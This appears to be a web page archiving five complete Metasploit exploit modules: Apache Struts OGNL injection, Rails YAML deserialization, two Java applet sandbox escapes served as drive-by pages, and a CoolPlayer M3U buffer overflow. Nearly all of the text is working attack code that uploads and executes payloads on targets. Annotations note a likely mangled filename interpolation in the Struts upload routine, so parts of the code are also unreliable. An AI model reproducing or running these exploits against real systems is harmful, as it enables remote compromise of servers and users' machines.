Archive for Remote Exploits

Apache Struts ParametersInterceptor Remote Code Execution

Apache Struts ParametersInterceptor Remote Code Execution Metasploit Exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # Struts 2 ParametersInterceptor OGNL injection (S2-009 / CVE-2011-3923); the
  # description below states the affected range as versions < 2.3.1.2.  The module
  # writes a payload file to the target in base64 chunks via OGNL expressions carried in
  # a request parameter, then executes it, and registers the file for cleanup.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata and options.  PARAMETER names the request parameter the OGNL
  # expression is injected through; TARGETURI must contain the literal token INJECT,
  # which execute_command replaces with the crafted query string.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Struts ParametersInterceptor Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote command execution vulnerability in Apache Struts
        versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows
        for the use of parentheses which in turn allows it to interpret parameter values as
        OGNL expressions during certain exception handling for mismatched data types of
        properties which allows remote attackers to execute arbitrary Java code via a
        crafted parameter.
      },
      'Author'         =>
        [
          'Meder Kydyraliev', # Vulnerability Discovery and PoC
          'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
          'mihi' # ARCH_JAVA support
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-3923'],
          [ 'OSVDB', '78501'],
          [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],
          [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']
        ],
      'Platform'      => [ 'win', 'linux', 'java'],
      'Privileged'     => true,
      'Targets'        =>
        [
          ['Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'windows'
            }
          ],
          ['Linux Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ],
          [ 'Java Universal',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            },
          ]
        ],
      'DisclosureDate' => 'Oct 01 2011',
      'DefaultTarget' => 2))

      # CHECK_SLEEPTIME drives the timing-based `check` below (seconds).
      register_options(
        [
          Opt::RPORT(8080),
          OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
          OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]),
          OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
    ], self.class)
  end

  # Send one OGNL expression to the target inside the PARAMETER query parameter and
  # return the raw HTTP response.
  #
  # @param cmd  [String] OGNL expression; substituted for the CMD token
  # @param opts [Hash]   unused here (kept for the conventional signature)
  # @return [Rex::Proto::Http::Response, nil] response object, consumed only by `check`
  def execute_command(cmd, opts = {})
    # The expression first assigns the two OGNL MemberAccess flags named literally in the
    # string, then evaluates CMD.  The second query parameter, z[(PARAMETERTOKEN)(meh)],
    # is the parenthesised parameter name the description says triggers OGNL evaluation.
    # NOTE(review): those two flag names are the obvious thing for request-inspection
    # rules (WAF/IDS) to key on.
    inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
    inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"
    # Only the user-supplied values are URI-encoded; the surrounding OGNL punctuation
    # (parentheses, '+', '&') is sent as-is.
    inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))
    inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))
    # Copy first so the gsub! below never mutates datastore['TARGETURI'] itself.
    uri = String.new(datastore['TARGETURI'])
    uri = normalize_uri(uri)
    uri.gsub!(/INJECT/,inject) # append the injection string
    resp = send_request_cgi({
      'uri'     => uri,
      'version' => '1.1',
      'method'  => 'GET',
    })
    return resp # Used for check function.
  end

  # Upload the generated payload in base64 chunks, then execute it.
  #
  # @payload_exe is the randomised remote file name; it is registered with FileDropper
  # at the end so the session handler can delete it afterwards.
  # @raise via fail_with when target['Platform'] is none of linux/java/windows
  def exploit
    #Set up generic values.
    @payload_exe = rand_text_alphanumeric(4+rand(4))
    pl_exe = generate_payload_exe
    append = 'false' # interpolated as the FileOutputStream(..., append) argument
    #Now arch specific...
    case target['Platform']
    when 'linux'
      @payload_exe = "/tmp/#{@payload_exe}"
      # Both command strings are split on '_' on the Java side, so they contain no
      # literal argument separators.
      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
    when 'java'
      # Java target: the payload is a jar loaded through a URLClassLoader and entered via
      # metasploit.Payload#main.  The two OgnlRuntime fields are rewritten first --
      # presumably to let OGNL resolve the reflection calls that follow (not established
      # by this file).
      @payload_exe << ".jar"
      pl_exe = payload.encoded_jar.pack
      exec_cmd = ""
      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
      exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
      exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
      exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
      exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
      exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
    when 'windows'
      @payload_exe = "./#{@payload_exe}.exe"
      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
    else
      fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')
    end

    #Now with all the arch specific stuff set, perform the upload.
    #109 = length of command string plus the max length of append.
    # Budget each request to 2048 bytes of URI: subtract the fixed overhead, then keep
    # 3/4 of the remainder because java_upload_part base64-encodes every chunk
    # (4 output bytes per 3 input bytes).
    sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length
    chunk_length = 2048 - sub_from_chunk
    chunk_length = ((chunk_length/4).floor)*3
    # All but the last chunk.  `append` changes type here from the string 'false' to the
    # boolean true; both interpolate to a valid Java boolean literal.
    while pl_exe.length > chunk_length
      java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
      pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]
      append = true
    end
    java_upload_part(pl_exe,@payload_exe,append) # final (possibly only) chunk
    execute_command(chmod_cmd) if target['Platform'] == 'linux' # chmod_cmd is only assigned in the linux branch
    execute_command(exec_cmd)
    register_files_for_cleanup(@payload_exe)
  end

  # Write one base64-encoded chunk of the payload to the remote file via OGNL.
  #
  # @param part     [String] raw bytes to write
  # @param filename [String] destination path -- NOTE(review): not referenced below; the
  #   literal '#(unknown)' in the FileOutputStream argument looks like a mangled
  #   interpolation of this parameter.  Verify against the upstream module.
  # @param append   [String, true] interpolated as the FileOutputStream append flag
  # @return whatever execute_command returns (the HTTP response), ignored by callers
  def java_upload_part(part, filename, append = 'false')
    cmd = ""
    cmd << "#f=new java.io.FileOutputStream('#(unknown)',#{append}),"
    cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
    cmd << "#f.close()"
    execute_command(cmd)
  end

  # Timing-based vulnerability check: ask the server to sleep CHECK_SLEEPTIME seconds
  # and compare the wall-clock round-trip time.
  #
  # @return [Exploit::CheckCode] Safe when there is no response or the reply came back
  #   faster than the requested sleep; Appears otherwise.  Any delay >= sleep_time,
  #   including an unrelated slow server or network, is reported as Appears, so treat
  #   the result as a heuristic.
  def check
    sleep_time = datastore['CHECK_SLEEPTIME']
    check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})" # Thread.sleep takes milliseconds
    # Wall clock; a monotonic clock would be immune to clock adjustments during the wait.
    t1 = Time.now
    print_status("Asking remote server to sleep for #{sleep_time} seconds")
    response = execute_command(check_cmd)
    t2 = Time.now
    delta = t2 - t1 # Float seconds


    if response.nil?
      return Exploit::CheckCode::Safe
    elsif delta < sleep_time
      return Exploit::CheckCode::Safe
    else
      return Exploit::CheckCode::Appears
    end
  end

end

Ruby on Rails JSON Processor YAML Deserialization Code Execution

Ruby on Rails JSON Processor YAML Deserialization Code Execution remote metasploit exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	# Rails JSON-parameter YAML deserialization (CVE-2013-0333).  Each YAML document built
	# below declares a `!ruby/hash:` of a routing class whose key string contains an
	# eval() of the base64-encoded payload; the YAML is sent as the body of an
	# application/json request (see exploit).
	Rank = ExcellentRanking

	include Msf::Exploit::CmdStagerTFTP
	include Msf::Exploit::Remote::HttpClient

	# Module metadata and options.  HTTP_METHOD is used verbatim as the request method;
	# exploit additionally sends an X-HTTP-Method-Override header.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution',
			'Description'    => %q{
					This module exploits a remote code execution vulnerability in the
				JSON request processor of the Ruby on Rails application framework.
				This vulnerability allows an attacker to instantiate a remote object,
				which in turn can be used to execute any ruby code remotely in the
				context of the application. This vulnerability is very similar to
				CVE-2013-0156.

				This module has been tested successfully on RoR 3.0.9, 3.0.19, and
				2.3.15.

				The technique used by this module requires the target to be running a
				fairly recent version of Ruby 1.9 (since 2011 or so). Applications
				using Ruby 1.8 may still be exploitable using the init_with() method,
				but this has not been demonstrated.

			},
			'Author'         =>
				[
					'jjarmoc',  # Initial module based on cve-2013-0156, testing help
					'egypt',    # Module
					'lian',     # Identified the RouteSet::NamedRouteCollection vector
				],
			'License'        => MSF_LICENSE,
			'References'  =>
				[
					['CVE', '2013-0333'],
				],
			'Platform'       => 'ruby',
			'Arch'           => ARCH_RUBY,
			'Privileged'     => false,
			'Targets'        =>	[ ['Automatic', {} ] ],
			'DisclosureDate' => 'Jan 28 2013',
			'DefaultOptions' => { "PrependFork" => true },
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(80),
				OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
				OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])

			], self.class)

	end

	#
	# Create the YAML document that will be embedded into the JSON (Rails 2.x class
	# names: ActionController::Routing::...).
	#
	# The hash key is a random alpha string followed by an eval() of the base64 payload;
	# the nested requirement keys are random too, so each request differs.
	#
	# @return [String] the YAML with every ':' replaced by the literal six characters
	#   \u003a (the replacement is single-quoted, so no escape is interpreted by Ruby;
	#   presumably the target's JSON parser decodes it back to ':' -- not shown here).
	#   gsub is non-destructive, so the value returned is a new string.
	#
	def build_yaml_rails2

		code = Rex::Text.encode_base64(payload.encoded)
		yaml =
			"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
			"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
			"eval(%[#{code}].unpack(%[m0])[0]);' " +
			": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n   " +
			":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n     :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
			":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
		yaml.gsub(':', '\u003a')
	end


	#
	# Create the YAML document that will be embedded into the JSON (Rails 3.x class
	# names: ActionDispatch::Routing::...; the value is an OpenStruct instead of a Route).
	#
	# @return [String] see build_yaml_rails2 for the ':' -> \u003a substitution.
	#
	def build_yaml_rails3

		code = Rex::Text.encode_base64(payload.encoded)
		yaml =
			"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
			"'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
			": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
		yaml.gsub(':', '\u003a')
	end

	# Select the document for a Rails major version.
	#
	# @param v [Integer] 2 or 3
	# @return [String, nil] the YAML body, or nil for any other value (no else branch)
	def build_request(v)
		case v
		when 2; build_yaml_rails2
		when 3; build_yaml_rails3
		end
	end

	#
	# Send the actual request
	#
	# Both the Rails 2 and the Rails 3 documents are sent to the same URI regardless of
	# which version is running.  The trailing 25 passed to send_request_cgi is presumably
	# a response timeout in seconds (not established by this file).  `handler` runs after
	# each request to pick up a session.
	#
	def exploit

		[2, 3].each do |ver|
			print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
			send_request_cgi({
				'uri'     => normalize_uri(target_uri.path),
				'method'  => datastore['HTTP_METHOD'],
				'ctype'   => 'application/json',
				'headers' => { 'X-HTTP-Method-Override' => 'get' },
				'data'    => build_request(ver)
			}, 25)
			handler
		end

	end
end

Java Applet Method Handle Remote Code Execution

Java Applet Method Handle Remote Code Execution metasploit remote exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
	# Browser-delivered Java applet exploit for CVE-2012-5088 (Java 7u7 and earlier per
	# the description).  The sandbox escape itself lives in precompiled class files under
	# data/exploits/cve-2012-5088; this module only packages them into a jar and serves
	# an HTML page that references it.
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({ :javascript => false })

	# Module metadata.  Payload 'Space' is capped at 20480 bytes with NOPs disabled.
	def initialize( info = {} )

		super( update_info( info,
			'Name'          => 'Java Applet Method Handle Remote Code Execution',
			'Description'   => %q{
					This module abuses the Method Handle class from a Java Applet to run arbitrary
				Java code outside of the sandbox. The vulnerability affects Java version 7u7 and
				earlier.
			},
			'License'       => MSF_LICENSE,
			'Author'        =>
				[
					'Unknown', # Vulnerability discovery at security-explorations.com
					'juan vazquez' # Metasploit module
				],
			'References'    =>
				[
					[ 'CVE', '2012-5088' ],
					# NOTE(review): '86352' is not a URL; the AverageRangeStatisticImpl module on
					# this page records its equivalent id under 'OSVDB', so the type here is
					# probably wrong.  Left unchanged: it is module metadata, not a comment.
					[ 'URL', '86352' ],
					[ 'BID', '56057' ],
					[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],
					[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
				],
			'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
			'Payload'       => { 'Space' => 20480, 'DisableNops' => true },
			'Targets'       =>
				[
					[ 'Generic (Java Payload)',
						{
							'Platform' => ['java'],
							'Arch' => ARCH_JAVA,
						}
					],
					[ 'Windows x86 (Native Payload)',
						{
							'Platform' => 'win',
							'Arch' => ARCH_X86,
						}
					],
					[ 'Mac OS X x86 (Native Payload)',
						{
							'Platform' => 'osx',
							'Arch' => ARCH_X86,
						}
					],
					[ 'Linux x86 (Native Payload)',
						{
							'Platform' => 'linux',
							'Arch' => ARCH_X86,
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Oct 16 2012'
		))
	end


	# Load the two precompiled classes from the framework data directory and randomise
	# the exploit class name.  The replacement is generated with the same length as
	# "Exploit" -- presumably so the class file's length-prefixed constant-pool strings
	# stay valid after the byte-level gsub! (not verified here).  B.class is served
	# under its original name.
	def setup
		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "Exploit.class")
		@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "B.class")
		@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

		@exploit_class_name = rand_text_alpha("Exploit".length)
		@exploit_class.gsub!("Exploit", @exploit_class_name)
		super
	end

	# HTTP request handler.  Three routes on request.uri:
	#   *.jar        -> the payload jar plus the two classes, with "metasploit" and
	#                   "Payload" renamed in both entry names and entry bytes
	#                   (gsub! in place on name, gsub with reassignment on data)
	#   trailing '/' -> (re)generate the payload for this client and serve the applet page
	#   anything else-> redirect to the resource root
	def on_request_uri(cli, request)
		print_status("handling request for #{request.uri}")

		case request.uri
		when /\.jar$/i
			jar = payload.encoded_jar
			jar.add_file("#{@exploit_class_name}.class", @exploit_class)
			jar.add_file("B.class", @loader_class)
			metasploit_str = rand_text_alpha("metasploit".length)
			payload_str = rand_text_alpha("payload".length)
			jar.entries.each { |entry|
				entry.name.gsub!("metasploit", metasploit_str)
				entry.name.gsub!("Payload", payload_str)
				entry.data = entry.data.gsub("metasploit", metasploit_str)
				entry.data = entry.data.gsub("Payload", payload_str)
			}
			jar.build_manifest

			send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
		when /\/$/
			# NOTE(review): this local shadows the module's `payload` method for the rest of
			# the branch; it is only nil-checked here.
			payload = regenerate_payload(cli)
			if not payload
				print_error("Failed to generate the payload.")
				send_not_found(cli)
				return
			end
			send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
		else
			send_redirect(cli, get_resource() + '/', '')
		end

	end

	# Minimal page embedding the applet.  The archive name is random on every call; any
	# URI ending in .jar is answered by on_request_uri, so the name need not match.
	#
	# @return [String] the HTML document
	def generate_html
		html  = %Q|<html><head><title>Download</title></head>|
		html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
		html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
		html += %Q|</applet></body></html>|
		return html
	end

end

Java Applet AverageRangeStatisticImpl Remote Code Execution

Java Applet AverageRangeStatisticImpl Remote Code Execution metasploit exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
	# Browser-delivered Java applet exploit for CVE-2012-5076 (Java 7u7 and earlier per
	# the description).  Structurally identical to the Method Handle module on this page:
	# the sandbox escape is in precompiled class files under data/exploits/cve-2012-5076_2,
	# and this module only packages them into a jar and serves the applet page.
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({ :javascript => false })

	# Module metadata.  Payload 'Space' is capped at 20480 bytes with NOPs disabled.
	def initialize( info = {} )

		super( update_info( info,
			'Name'          => 'Java Applet AverageRangeStatisticImpl Remote Code Execution',
			'Description'   => %q{
					This module abuses the AverageRangeStatisticImpl from a Java Applet to run
				arbitrary Java code outside of the sandbox, a different exploit vector than the one
				exploited in the wild in November of 2012. The vulnerability affects Java version
				7u7 and earlier.
			},
			'License'       => MSF_LICENSE,
			'Author'        =>
				[
					'Unknown', # Vulnerability discovery at security-explorations
					'juan vazquez' # Metasploit module
				],
			'References'    =>
				[
					[ 'CVE', '2012-5076' ],
					[ 'OSVDB', '86363' ],
					[ 'BID', '56054' ],
					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
					[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076' ],
					[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
				],
			'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
			'Payload'       => { 'Space' => 20480, 'DisableNops' => true },
			'Targets'       =>
				[
					[ 'Generic (Java Payload)',
						{
							'Platform' => ['java'],
							'Arch' => ARCH_JAVA,
						}
					],
					[ 'Windows x86 (Native Payload)',
						{
							'Platform' => 'win',
							'Arch' => ARCH_X86,
						}
					],
					[ 'Mac OS X x86 (Native Payload)',
						{
							'Platform' => 'osx',
							'Arch' => ARCH_X86,
						}
					],
					[ 'Linux x86 (Native Payload)',
						{
							'Platform' => 'linux',
							'Arch' => ARCH_X86,
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Oct 16 2012'
		))
	end


	# Load the two precompiled classes from the framework data directory and randomise
	# the exploit class name.  The replacement has the same length as "Exploit" --
	# presumably so the class file's length-prefixed constant-pool strings stay valid
	# after the byte-level gsub! (not verified here).  B.class keeps its original name.
	def setup
		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "Exploit.class")
		@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "B.class")
		@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

		@exploit_class_name = rand_text_alpha("Exploit".length)
		@exploit_class.gsub!("Exploit", @exploit_class_name)
		super
	end

	# HTTP request handler.  Three routes on request.uri:
	#   *.jar        -> the payload jar plus the two classes, with "metasploit" and
	#                   "Payload" renamed in both entry names and entry bytes
	#                   (gsub! in place on name, gsub with reassignment on data)
	#   trailing '/' -> (re)generate the payload for this client and serve the applet page
	#   anything else-> redirect to the resource root
	def on_request_uri(cli, request)
		print_status("handling request for #{request.uri}")

		case request.uri
		when /\.jar$/i
			jar = payload.encoded_jar
			jar.add_file("#{@exploit_class_name}.class", @exploit_class)
			jar.add_file("B.class", @loader_class)
			metasploit_str = rand_text_alpha("metasploit".length)
			payload_str = rand_text_alpha("payload".length)
			jar.entries.each { |entry|
				entry.name.gsub!("metasploit", metasploit_str)
				entry.name.gsub!("Payload", payload_str)
				entry.data = entry.data.gsub("metasploit", metasploit_str)
				entry.data = entry.data.gsub("Payload", payload_str)
			}
			jar.build_manifest

			send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
		when /\/$/
			# NOTE(review): this local shadows the module's `payload` method for the rest of
			# the branch; it is only nil-checked here.
			payload = regenerate_payload(cli)
			if not payload
				print_error("Failed to generate the payload.")
				send_not_found(cli)
				return
			end
			send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
		else
			send_redirect(cli, get_resource() + '/', '')
		end

	end

	# Minimal page embedding the applet.  The archive name is random on every call; any
	# URI ending in .jar is answered by on_request_uri, so the name need not match.
	#
	# @return [String] the HTML document
	def generate_html
		html  = %Q|<html><head><title>Download</title></head>|
		html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
		html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
		html += %Q|</applet></body></html>|
		return html
	end

end

CoolPlayerPlusPortable 2.19.4 (M3U File) Stack Buffer Overflow

CoolPlayerPlusPortable 2.19.4 (M3U File) Stack Buffer Overflow Remote Exploit

#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# Inj3ct0r / 1337day.com exploit-database header (ASCII-art banner condensed):
#   [+] Site            : 1337day.com
#   [+] Support e-mail  : submit[at]1337day.com
#   I'm The Black Devils member from Inj3ct0r Team
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#
# Greeting To : r0073r / KedAns-Dz / All DZ Hackerz
#
# File-format module: it only writes a local .m3u file (FILENAME); nothing is sent to a
# remote host, and the payload handler is disabled by default (DisablePayloadHandler).
# The source of this page had the whole module collapsed onto a single line; the code
# below is that text re-broken into lines, with every non-comment token unchanged.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::FILEFORMAT

	# Module metadata.  Payload space is 268 bytes with BadChars \x00\x0a\x0d; the single
	# target carries one hard-coded return address ('Ret'), so the module is tied to one
	# specific Windows build and will simply crash the player anywhere else.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CoolPlayerPlusPortable 2.19.4 (M3U File) Stack Buffer Overflow',
			'Description'    => %q{This module exploits a stack-based buffer overflow in CoolplayerPlus 2.19.4  An attacker must send the file to the victim and the victim must open the file.},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'The Black Devils',      # Initial Discovery
				],
			'Version'        => '$Revision: $',
			'References'     =>
				[
					[ 'URL', 'http://1337day.com/exploits/20148' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'DisablePayloadHandler' => 'true',
				},
			'Payload'        =>
				{
					'Space'    => 268,
					'BadChars' => "\x00\x0a\x0d",
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows Universal', { 'Ret' => 0x77f31d8a } ],
				],
			'Privileged'     => false,
			# NOTE(review): misspelled month and trailing space in the date string; left
			# as-is because it is runtime metadata, not a comment.
			'DisclosureDate' => 'Janury 17 2013 ',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'inj3ctor.m3u']),
			], self.class)
	end

	# Build the playlist: 220 bytes of upper-case filler, the 32-bit little-endian
	# return address, 12 NOP bytes, then the encoded payload; write it via file_create.
	def exploit
		m3u = rand_text_alpha_upper(220) + [target.ret].pack('V')
		m3u << make_nops(12)
		m3u << payload.encoded
		print_status("Creating '#{datastore['FILENAME']}' file ...")
		file_create(m3u)
	end
end

# FA90F81A4D4D6BB1   1337day.com [2013-01-27]   FD865C614C897B00 #